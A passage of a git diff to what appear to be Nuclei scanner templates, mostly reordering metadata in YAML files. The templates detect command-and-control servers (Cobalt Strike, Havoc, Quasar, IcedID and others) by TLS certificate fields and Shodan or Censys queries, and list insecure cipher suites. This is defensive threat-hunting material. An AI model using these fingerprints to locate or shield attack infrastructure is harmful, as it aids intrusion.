'services.tls.certificates.leaf_data.subject.common_name: "BitRAT"' - max-request: 1 verified: "true" + max-request: 1 + censys-query: 'services.tls.certificates.leaf_data.subject.common_name: "BitRAT"' tags: c2,ir,osint,bitrat,ssl - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: issuer_cn diff --git a/ssl/c2/cobalt-strike-c2.yaml b/ssl/c2/cobalt-strike-c2.yaml index df481f70b8..37bf19a47c 100644 --- a/ssl/c2/cobalt-strike-c2.yaml +++ b/ssl/c2/cobalt-strike-c2.yaml @@ -5,18 +5,16 @@ info: author: pussycat0x severity: info description: | - Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer's network. + Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer's network. reference: - https://blog.sekoia.io/hunting-and-detecting-cobalt-strike/ metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: ssl.cert.serial:146473198 tags: ssl,c2,ir,osint,panel - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: dsl dsl: diff --git a/ssl/c2/covenant-c2-ssl.yaml b/ssl/c2/covenant-c2-ssl.yaml index 064b894789..d1a90752d4 100644 --- a/ssl/c2/covenant-c2-ssl.yaml +++ b/ssl/c2/covenant-c2-ssl.yaml @@ -9,14 +9,12 @@ info: reference: | https://twitter.com/MichalKoczwara/status/1548685058403360770 metadata: + verified: "true" max-request: 1 shodan-query: ssl:”Covenant” http.component:”Blazor” - verified: "true" tags: c2,ir,osint,covenant,ssl - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: subject_dn diff --git a/ssl/c2/dcrat-server-c2.yaml b/ssl/c2/dcrat-server-c2.yaml index 00e05abb2e..90646500b2 100644 --- a/ssl/c2/dcrat-server-c2.yaml +++ b/ssl/c2/dcrat-server-c2.yaml @@ -9,14 +9,12 @@ info: reference: | https://github.com/thehappydinoa/awesome-censys-queries#dcrat-- metadata: - censys-query: 'services.tls.certificates.leaf_data.subject.common_name: "DcRat Server"' - max-request: 1 verified: "true" + max-request: 1 + censys-query: 'services.tls.certificates.leaf_data.subject.common_name: "DcRat Server"' tags: c2,ir,osint,dcrat,ssl - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: issuer_cn diff --git a/ssl/c2/gozi-malware-c2.yaml b/ssl/c2/gozi-malware-c2.yaml index d6a2478fd5..77de2e07be 100644 --- a/ssl/c2/gozi-malware-c2.yaml +++ b/ssl/c2/gozi-malware-c2.yaml @@ -9,14 +9,12 @@ info: reference: | https://github.com/thehappydinoa/awesome-censys-queries#gozi-malware-- metadata: - censys-query: 'services.tls.certificates.leaf_data.issuer_dn: "C=XX, ST=1, L=1, O=1, OU=1, CN=\*"' - max-request: 1 verified: "true" + max-request: 1 + censys-query: 'services.tls.certificates.leaf_data.issuer_dn: "C=XX, ST=1, L=1, O=1, OU=1, CN=\*"' tags: c2,ir,osint,gozi,malware,ssl - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: issuer_dn diff --git a/ssl/c2/havoc-c2.yaml b/ssl/c2/havoc-c2.yaml index 43cc2addfa..164cc52fe4 100644 --- a/ssl/c2/havoc-c2.yaml +++ b/ssl/c2/havoc-c2.yaml @@ -10,14 +10,12 @@ info: - https://github.com/HavocFramework/Havoc - https://github.com/montysecurity/C2-Tracker metadata: - shodan-query: 'ssl:postalCode=3540 ssl.jarm:3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e' - max-request: 1 verified: "true" + max-request: 1 + shodan-query: 'ssl:postalCode=3540 ssl.jarm:3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e' tags: c2,ir,osint,havoc,ssl - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: subject_dn @@ -27,4 +25,4 @@ ssl: extractors: - type: json json: - - ".issuer_dn" \ No newline at end of file + - ".issuer_dn" diff --git a/ssl/c2/icedid.yaml b/ssl/c2/icedid.yaml index e7a8d4cced..113b96f244 100644 --- a/ssl/c2/icedid.yaml +++ b/ssl/c2/icedid.yaml @@ -7,14 +7,12 @@ info: description: | IcedID, also known as BokBot, is a modular banking trojan that targets user financial information and is capable of acting as a dropper for other malware. It uses a man-in-the-browser attack to steal financial information, including login credentials for online banking sessions. Once it successfully completes its initial attack, it uses the stolen information to take over banking accounts and automate fraudulent transactions. IcedID is primarily dropped as a secondary payload from other malware, most notably Emotet, in addition to its own malspam campaigns. IcedID uses multiple injection methods to evade antivirus and other malware detection methods, such as injecting itself into operating system (OS) memory and regular processes. The malware authors are known to update IcedID to increase persistence and evade new detection efforts. metadata: - censys-query: CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd - max-request: 1 verified: "true" + max-request: 1 + censys-query: CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd tags: c2,ir,osint,malware,bokbot,trojan - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: subject_dn diff --git a/ssl/c2/metasploit-c2.yaml b/ssl/c2/metasploit-c2.yaml index 6f4a0f8e1d..b0e633a141 100644 --- a/ssl/c2/metasploit-c2.yaml +++ b/ssl/c2/metasploit-c2.yaml @@ -9,14 +9,12 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: ssl:"MetasploitSelfSignedCA" tags: c2,ir,osint,metasploit,panel - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: issuer_cn diff --git a/ssl/c2/mythic-c2-ssl.yaml b/ssl/c2/mythic-c2-ssl.yaml index c8881d969c..2c544c16f4 100644 --- a/ssl/c2/mythic-c2-ssl.yaml +++ b/ssl/c2/mythic-c2-ssl.yaml @@ -10,15 +10,13 @@ info: https://docs.mythic-c2.net https://www.team-cymru.com/post/mythic-case-study-assessing-common-offensive-security-tools metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: ssl:"Mythic" censys-query: services.tls.certificates.leaf_data.issuer.common_name:Mythic tags: c2,ir,osint,malware - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: issuer_dn diff --git a/ssl/c2/orcus-rat-c2.yaml b/ssl/c2/orcus-rat-c2.yaml index 91d7dd3ec5..4d786aa770 100644 --- a/ssl/c2/orcus-rat-c2.yaml +++ b/ssl/c2/orcus-rat-c2.yaml @@ -9,14 +9,12 @@ info: reference: | https://github.com/thehappydinoa/awesome-censys-queries#orcusrat-- metadata: - censys-query: 'services.tls.certificates.leaf_data.subject.common_name: {"Orcus Server", "OrcusServerCertificate"}' - max-request: 1 verified: "true" + max-request: 1 + censys-query: 'services.tls.certificates.leaf_data.subject.common_name: {"Orcus Server", "OrcusServerCertificate"}' tags: c2,ir,osint,orcus,ssl - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: issuer_cn diff --git a/ssl/c2/posh-c2.yaml b/ssl/c2/posh-c2.yaml index c0affa7f17..c9e357e6bf 100644 --- a/ssl/c2/posh-c2.yaml +++ b/ssl/c2/posh-c2.yaml @@ -10,14 +10,12 @@ info: - https://twitter.com/MichalKoczwara/status/1551639708949692416 - https://poshc2.readthedocs.io/en/latest/ metadata: + verified: "true" max-request: 1 shodan-query: ssl:"P18055077" - verified: "true" tags: c2,ir,osint,posh,ssl - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: issuer_cn diff --git a/ssl/c2/quasar-rat-c2.yaml b/ssl/c2/quasar-rat-c2.yaml index 2bfbb82a05..595f1d5819 100644 --- a/ssl/c2/quasar-rat-c2.yaml +++ b/ssl/c2/quasar-rat-c2.yaml @@ -9,15 +9,13 @@ info: reference: | https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: ssl.cert.subject.cn:"Quasar Server CA" censys-query: 'services.tls.certificates.leaf_data.subject.common_name: {"Orcus Server","OrcusServerCertificate"}' tags: c2,ir,osint,malware,quasar,rat - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: issuer_cn diff --git a/ssl/c2/shadowpad-c2.yaml b/ssl/c2/shadowpad-c2.yaml index d148047ef6..170878c8fc 100644 --- a/ssl/c2/shadowpad-c2.yaml +++ b/ssl/c2/shadowpad-c2.yaml @@ -7,14 +7,12 @@ info: description: | ShadowPad constitutes various plugins having specific functionality and the malware has the capability to “plug” or “unplug” these plugins at run-time in shellcode format. It can also load additional plugins dynamically from the C2 server when required. metadata: - censys-query: services.tls.certificates.leaf_data.subject_dn="C=CN, ST=myprovince, L=mycity, O=myorganization, OU=mygroup, CN=myServer" - max-request: 1 verified: "true" + max-request: 1 + censys-query: services.tls.certificates.leaf_data.subject_dn="C=CN, ST=myprovince, L=mycity, O=myorganization, OU=mygroup, CN=myServer" tags: c2,ir,osint,malware - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: subject_dn diff --git a/ssl/detect-ssl-issuer.yaml b/ssl/detect-ssl-issuer.yaml index 961a482eca..992eeba57b 100644 --- a/ssl/detect-ssl-issuer.yaml +++ b/ssl/detect-ssl-issuer.yaml @@ -6,10 +6,9 @@ info: severity: info description: | Extract the issuer's organization from the target's certificate. Issuers are entities which sign and distribute certificates. - tags: ssl metadata: max-request: 1 - + tags: ssl ssl: - address: "{{Host}}:{{Port}}" diff --git a/ssl/expired-ssl.yaml b/ssl/expired-ssl.yaml index 90d253a08a..b8ff248bca 100644 --- a/ssl/expired-ssl.yaml +++ b/ssl/expired-ssl.yaml @@ -4,19 +4,17 @@ info: name: Expired SSL Certificate author: pdteam severity: low - reference: - - https://www.acunetix.com/vulnerabilities/web/tls-ssl-certificate-about-to-expire/ description: | After an SSL certificate expires, you will no longer be able to communicate over a secure, encrypted HTTPS connection. remediation: | Purchase or generate a new SSL/TLS certificate to replace the existing one. - tags: ssl + reference: + - https://www.acunetix.com/vulnerabilities/web/tls-ssl-certificate-about-to-expire/ metadata: max-request: 1 - + tags: ssl ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: dsl dsl: @@ -25,4 +23,4 @@ ssl: extractors: - type: kval kval: - - "not_after" \ No newline at end of file + - "not_after" diff --git a/ssl/insecure-cipher-suite-detect.yaml b/ssl/insecure-cipher-suite-detect.yaml index 2cfe5f2d1b..d8edb92f9c 100644 --- a/ssl/insecure-cipher-suite-detect.yaml +++ b/ssl/insecure-cipher-suite-detect.yaml @@ -1,5 +1,5 @@ -id: insecure-cipher-suite-detect - +id: insecure-cipher-suite-detect + info: name: Insecure Cipher Suite Detection author: pussycat0x @@ -11,411 +11,411 @@ info: metadata: max-request: 4 tags: ssl -ssl: - - address: "{{Host}}:{{Port}}" - min_version: tls10 - max_version: tls10 - - extractors: - - type: dsl - dsl: - - "tls_version, cipher" - matchers: - - type: word - part: cipher - words: - - "TLS_DHE_PSK_WITH_NULL_SHA384" - - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" - - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" - - "TLS_NULL_WITH_NULL_NULL" - - "TLS_DH_DSS_WITH_DES_CBC_SHA" - - "TLS_ECDH_RSA_WITH_NULL_SHA" - - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_AES_256_CBC_SHA" - - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" - - "TLS_RSA_WITH_RC4_128_MD5" - - "TLS_SM4_CCM_SM3" - - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" - - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_ECDH_RSA_WITH_RC4_128_SHA" - - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" - - "TLS_RSA_PSK_WITH_RC4_128_SHA" - - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" - - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" - - "TLS_DHE_PSK_WITH_NULL_SHA256" - - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" - - "TLS_PSK_WITH_RC4_128_SHA" - - "TLS_DHE_PSK_WITH_RC4_128_SHA" - - "TLS_KRB5_WITH_DES_CBC_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" - - "TLS_PSK_WITH_NULL_SHA" - - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_RC4_128_MD5" - - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" - - "TLS_RSA_WITH_NULL_MD5" - - "TLS_SHA384_SHA384" - - "TLS_SHA256_SHA256" - - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" - - "TLS_RSA_WITH_NULL_SHA256" - - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" - - "TLS_RSA_WITH_DES_CBC_SHA" - - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" - - "TLS_PSK_WITH_NULL_SHA384" - - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_KRB5_WITH_RC4_128_MD5" - - "TLS_DH_anon_WITH_AES_128_CBC_SHA" - - "TLS_DHE_PSK_WITH_NULL_SHA" - - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" - - "TLS_DH_anon_WITH_DES_CBC_SHA" - - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DH_anon_WITH_SEED_CBC_SHA" - - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" - - "TLS_DHE_DSS_WITH_DES_CBC_SHA" - - "TLS_PSK_WITH_NULL_SHA256" - - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" - - "TLS_ECDHE_PSK_WITH_NULL_SHA" - - "TLS_ECDH_anon_WITH_NULL_SHA" - - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" - - "TLS_KRB5_WITH_IDEA_CBC_MD5" - - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" - - "TLS_ECDHE_RSA_WITH_NULL_SHA" - - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" - - "TLS_RSA_PSK_WITH_NULL_SHA" - - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_KRB5_WITH_DES_CBC_MD5" - - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" - - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" - - "TLS_SM4_GCM_SM3" - - "TLS_ECDHE_PSK_WITH_NULL_SHA384" - - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" - - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" - - "TLS_RSA_PSK_WITH_NULL_SHA256" - - "TLS_ECDHE_PSK_WITH_NULL_SHA256" - - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" - - "TLS_DH_RSA_WITH_DES_CBC_SHA" - - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_RC4_128_SHA" - - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DHE_RSA_WITH_DES_CBC_SHA" - - "TLS_RSA_WITH_RC4_128_SHA" - - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" - - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" - - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" - - "TLS_ECDH_ECDSA_WITH_NULL_SHA" - - "TLS_RSA_PSK_WITH_NULL_SHA384" - - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" - - "TLS_KRB5_WITH_RC4_128_SHA" - - "TLS_RSA_WITH_NULL_SHA" - condition: or - - - address: "{{Host}}:{{Port}}" - min_version: tls11 - max_version: tls11 - - extractors: - - type: dsl - dsl: - - "tls_version, cipher" - matchers: - - type: word - part: cipher - words: - - "TLS_DHE_PSK_WITH_NULL_SHA384" - - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" - - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" - - "TLS_NULL_WITH_NULL_NULL" - - "TLS_DH_DSS_WITH_DES_CBC_SHA" - - "TLS_ECDH_RSA_WITH_NULL_SHA" - - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_AES_256_CBC_SHA" - - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" - - "TLS_RSA_WITH_RC4_128_MD5" - - "TLS_SM4_CCM_SM3" - - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" - - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_ECDH_RSA_WITH_RC4_128_SHA" - - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" - - "TLS_RSA_PSK_WITH_RC4_128_SHA" - - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" - - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" - - "TLS_DHE_PSK_WITH_NULL_SHA256" - - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" - - "TLS_PSK_WITH_RC4_128_SHA" - - "TLS_DHE_PSK_WITH_RC4_128_SHA" - - "TLS_KRB5_WITH_DES_CBC_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" - - "TLS_PSK_WITH_NULL_SHA" - - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_RC4_128_MD5" - - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" - - "TLS_RSA_WITH_NULL_MD5" - - "TLS_SHA384_SHA384" - - "TLS_SHA256_SHA256" - - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" - - "TLS_RSA_WITH_NULL_SHA256" - - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" - - "TLS_RSA_WITH_DES_CBC_SHA" - - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" - - "TLS_PSK_WITH_NULL_SHA384" - - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_KRB5_WITH_RC4_128_MD5" - - "TLS_DH_anon_WITH_AES_128_CBC_SHA" - - "TLS_DHE_PSK_WITH_NULL_SHA" - - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" - - "TLS_DH_anon_WITH_DES_CBC_SHA" - - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DH_anon_WITH_SEED_CBC_SHA" - - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" - - "TLS_DHE_DSS_WITH_DES_CBC_SHA" - - "TLS_PSK_WITH_NULL_SHA256" - - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" - - "TLS_ECDHE_PSK_WITH_NULL_SHA" - - "TLS_ECDH_anon_WITH_NULL_SHA" - - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" - - "TLS_KRB5_WITH_IDEA_CBC_MD5" - - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" - - "TLS_ECDHE_RSA_WITH_NULL_SHA" - - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" - - "TLS_RSA_PSK_WITH_NULL_SHA" - - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_KRB5_WITH_DES_CBC_MD5" - - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" - - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" - - "TLS_SM4_GCM_SM3" - - "TLS_ECDHE_PSK_WITH_NULL_SHA384" - - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" - - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" - - "TLS_RSA_PSK_WITH_NULL_SHA256" - - "TLS_ECDHE_PSK_WITH_NULL_SHA256" - - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" - - "TLS_DH_RSA_WITH_DES_CBC_SHA" - - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_RC4_128_SHA" - - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DHE_RSA_WITH_DES_CBC_SHA" - - "TLS_RSA_WITH_RC4_128_SHA" - - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" - - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" - - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" - - "TLS_ECDH_ECDSA_WITH_NULL_SHA" - - "TLS_RSA_PSK_WITH_NULL_SHA384" - - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" - - "TLS_KRB5_WITH_RC4_128_SHA" - - "TLS_RSA_WITH_NULL_SHA" - condition: or - - - address: "{{Host}}:{{Port}}" - min_version: tls12 - max_version: tls12 - - extractors: - - type: dsl - dsl: - - "tls_version, cipher" - matchers: - - type: word - part: cipher - words: - - "TLS_DHE_PSK_WITH_NULL_SHA384" - - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" - - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" - - "TLS_NULL_WITH_NULL_NULL" - - "TLS_DH_DSS_WITH_DES_CBC_SHA" - - "TLS_ECDH_RSA_WITH_NULL_SHA" - - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_AES_256_CBC_SHA" - - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" - - "TLS_RSA_WITH_RC4_128_MD5" - - "TLS_SM4_CCM_SM3" - - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" - - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_ECDH_RSA_WITH_RC4_128_SHA" - - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" - - "TLS_RSA_PSK_WITH_RC4_128_SHA" - - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" - - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" - - "TLS_DHE_PSK_WITH_NULL_SHA256" - - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" - - "TLS_PSK_WITH_RC4_128_SHA" - - "TLS_DHE_PSK_WITH_RC4_128_SHA" - - "TLS_KRB5_WITH_DES_CBC_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" - - "TLS_PSK_WITH_NULL_SHA" - - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_RC4_128_MD5" - - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" - - "TLS_RSA_WITH_NULL_MD5" - - "TLS_SHA384_SHA384" - - "TLS_SHA256_SHA256" - - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" - - "TLS_RSA_WITH_NULL_SHA256" - - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" - - "TLS_RSA_WITH_DES_CBC_SHA" - - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" - - "TLS_PSK_WITH_NULL_SHA384" - - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_KRB5_WITH_RC4_128_MD5" - - "TLS_DH_anon_WITH_AES_128_CBC_SHA" - - "TLS_DHE_PSK_WITH_NULL_SHA" - - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" - - "TLS_DH_anon_WITH_DES_CBC_SHA" - - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DH_anon_WITH_SEED_CBC_SHA" - - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" - - "TLS_DHE_DSS_WITH_DES_CBC_SHA" - - "TLS_PSK_WITH_NULL_SHA256" - - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" - - "TLS_ECDHE_PSK_WITH_NULL_SHA" - - "TLS_ECDH_anon_WITH_NULL_SHA" - - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" - - "TLS_KRB5_WITH_IDEA_CBC_MD5" - - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" - - "TLS_ECDHE_RSA_WITH_NULL_SHA" - - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" - - "TLS_RSA_PSK_WITH_NULL_SHA" - - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_KRB5_WITH_DES_CBC_MD5" - - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" - - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" - - "TLS_SM4_GCM_SM3" - - "TLS_ECDHE_PSK_WITH_NULL_SHA384" - - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" - - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" - - "TLS_RSA_PSK_WITH_NULL_SHA256" - - "TLS_ECDHE_PSK_WITH_NULL_SHA256" - - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" - - "TLS_DH_RSA_WITH_DES_CBC_SHA" - - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_RC4_128_SHA" - - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DHE_RSA_WITH_DES_CBC_SHA" - - "TLS_RSA_WITH_RC4_128_SHA" - - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" - - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" - - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" - - "TLS_ECDH_ECDSA_WITH_NULL_SHA" - - "TLS_RSA_PSK_WITH_NULL_SHA384" - - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" - - "TLS_KRB5_WITH_RC4_128_SHA" - - "TLS_RSA_WITH_NULL_SHA" - condition: or - - - address: "{{Host}}:{{Port}}" - min_version: tls13 - max_version: tls13 - - extractors: - - type: dsl - dsl: - - "tls_version, cipher" - matchers: - - type: word - part: cipher - words: - - "TLS_DHE_PSK_WITH_NULL_SHA384" - - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" - - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" - - "TLS_NULL_WITH_NULL_NULL" - - "TLS_DH_DSS_WITH_DES_CBC_SHA" - - "TLS_ECDH_RSA_WITH_NULL_SHA" - - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_AES_256_CBC_SHA" - - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" - - "TLS_RSA_WITH_RC4_128_MD5" - - "TLS_SM4_CCM_SM3" - - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" - - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_ECDH_RSA_WITH_RC4_128_SHA" - - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" - - "TLS_RSA_PSK_WITH_RC4_128_SHA" - - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" - - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" - - "TLS_DHE_PSK_WITH_NULL_SHA256" - - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" - - "TLS_PSK_WITH_RC4_128_SHA" - - "TLS_DHE_PSK_WITH_RC4_128_SHA" - - "TLS_KRB5_WITH_DES_CBC_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" - - "TLS_PSK_WITH_NULL_SHA" - - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_RC4_128_MD5" - - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" - - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" - - "TLS_RSA_WITH_NULL_MD5" - - "TLS_SHA384_SHA384" - - "TLS_SHA256_SHA256" - - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" - - "TLS_RSA_WITH_NULL_SHA256" - - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" - - "TLS_RSA_WITH_DES_CBC_SHA" - - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" - - "TLS_PSK_WITH_NULL_SHA384" - - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_KRB5_WITH_RC4_128_MD5" - - "TLS_DH_anon_WITH_AES_128_CBC_SHA" - - "TLS_DHE_PSK_WITH_NULL_SHA" - - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" - - 